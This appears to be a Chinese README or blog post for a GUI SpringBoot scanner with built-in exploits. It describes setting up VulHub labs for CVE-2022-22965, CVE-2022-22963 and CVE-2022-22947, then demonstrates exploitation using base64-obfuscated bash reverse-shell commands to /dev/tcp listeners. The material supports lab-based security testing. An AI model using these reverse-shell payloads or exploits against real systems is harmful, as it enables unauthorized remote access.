注意:本工具内置相关漏洞的Exp,杀软报毒属于正常现象!

Windows使用

python3 SpringBoot-Scan-GUI.py

也可以直接下载执行release打包好的exe程序

Linux使用

python3 SpringBoot-Scan-GUI-Linux.py

或者使用 wine 来执行:

sudo wine SpringBoot-Scan-GUI.exe

VulHub 漏洞测试环境搭建

git clone https:///vulhub/vulhub.git

安装Docker环境

sudo apt-get install 
sudo apt install docker-compose

搭建CVE-2022-22965

cd /vulhub/CVE-2022-22965
sudo docker-compose up -d

搭建CVE-2022-22963

cd /vulhub/CVE-2022-22963
sudo docker-compose up -d

搭建CVE-2022-22947

cd /vulhub/CVE-2022-22947
sudo docker-compose up -d

如果报错,自行修改 ​​.yml​​ 文件中映射的端口号

漏洞复现演示

一、CVE-2022-22965

VulHub 环境复现

一款GUI版的SpringBoot扫描器_Springboot

​​ ​​​​​​ ​​​​内置shell​​

一款GUI版的SpringBoot扫描器_GUI_02

aabysszg-shell​​

一款GUI版的SpringBoot扫描器_Springboot_03

13exp-shell

一款GUI版的SpringBoot扫描器_GUI_04

春秋云境 环境复现

内置shell​​

一款GUI版的SpringBoot扫描器_网络安全_05

13exp-shell​​

一款GUI版的SpringBoot扫描器_网络安全_06

aabysszg-shell​​​ ​

一款GUI版的SpringBoot扫描器_网络安全_07

二、CVE-2022-22963

VulHub 环境复现

准备反弹shell:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)

编码内容→ ​​bash -i >& /dev/tcp/192.168.0.105/8888 0>&1​

Kali监听对应端口: ​

一款GUI版的SpringBoot扫描器_GUI_08

漏洞利用​​​​ ​​​​

一款GUI版的SpringBoot扫描器_Springboot_09

一款GUI版的SpringBoot扫描器_网络安全_10

春秋云境 环境复现

注:云境反弹shell需使用公网服务器

服务器监听

一款GUI版的SpringBoot扫描器_Springboot_11

一款GUI版的SpringBoot扫描器_网络安全_12

一款GUI版的SpringBoot扫描器_GUI_13

三、CVE-2022-22947

VulHub 环境复现

同样准备反弹shell

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODkgMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)

编码内容→ bash -i >& /dev/tcp/192.168.0.105/8889 0>&1

kali监听对应端口:

一款GUI版的SpringBoot扫描器_GUI_14

漏洞利用​​​​ ​​​​

一款GUI版的SpringBoot扫描器_Springboot_15

一款GUI版的SpringBoot扫描器_网络安全_16

春秋云境 环境复现

一款GUI版的SpringBoot扫描器_GUI_17

一款GUI版的SpringBoot扫描器_网络安全_18